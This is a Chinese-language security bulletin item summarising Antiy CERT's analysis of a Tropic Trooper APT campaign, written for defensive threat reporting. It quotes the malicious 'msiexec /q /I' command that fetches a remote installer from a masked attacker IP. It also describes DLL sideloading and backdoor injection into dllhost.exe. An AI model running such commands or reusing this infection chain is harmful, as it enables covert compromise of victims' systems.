141期报告汇总
安天发布《Tropic Trooper APT 组织攻击活动分析报告》
近日,安天 CERT(安全研究与应急 处理中心)在梳理网络安全事件时发现了 Tropic Trooper APT 组织的最新攻击活动。 Tropic Trooper APT 组织自 2011 年(至少) 活跃至今。Trend Micro 安全专家在 2015 年第一次发现该组织,当时其对菲律宾军 方和亚洲部分国家地区的行政机构、重工 业行业实施网络攻击。
在其最新的攻击活动中,攻击者使用 了 具 有 CVE-2017-11882 或 CVE-2018-0802 漏洞的文档来对目标进行攻击。一 旦用户打开了漏洞文档,则会运行命令 “msiexec /q /I hxxp://61.216.***.***/ in.sys”,其中 in.sys 是一个安装文件,运 行后会释放带有后门的文件 UserInstall.exe 然 后 删 除 自 身。UserInstall.exe 运 行 后 会在 C:\ProgramData\Apple\Update\ 文 件 夹 下释放一个白文件 sidebar.exe(Win7 中的 桌面小工具)、一个恶意文件 wab32res. dll 以 及 一 个 加 密 的 配 置 文 件 secn. tsp。UserInstall.exe 使 用 C:\Windows\ SysWOW64\bitsadmin.exe 来 运 行 sidebar. exe,通过 dll 劫持使其加载 wab32res.dll, 从而避免被杀毒软件检测到。wab32res. dll 被 加 载 后 会 运 行 dllhost.exe, 并 在 dllhost.exe 进 程 中 注 入 dll 后 门 TClient, wab32res.dll 会创建一个硬编码的互斥量避 免将 dll 后门注入到其他的 dllhost.exe 进程 中。TClient 会加载配置文件 secn.tsp,对 其进行解密操作,然后与 C2 服务器进行 通信。
在持续跟踪分析 APT 攻击事件的同时,相关攻击组织也在不断进化和升级, 其攻击行动并不会因被曝光而停歇。攻击 组织为达成战略目的会不断更新、修改战 术,如恶意代码的源码更新、最新漏洞的 利用、最新商业军火的购买等,有些组织 甚至会全面规避以往的行为特点和攻击资 源。通过曝光威慑 APT 攻击者,将提高其 攻击成本、收窄收割范围,也有助于被攻 击方获取舆论和道义上的主动,并更深入 认知相关威胁。但另一方面,其也会导致 攻击者调整攻击资源和设施,提升攻击策 略,以研发和采用更先进的攻击装备。因 此,对 APT 的防御必须立足于长期、持续、 系统的安全建设和投入之上。
目前,安天追影产品已经实现了对该 类恶意代码的检出。
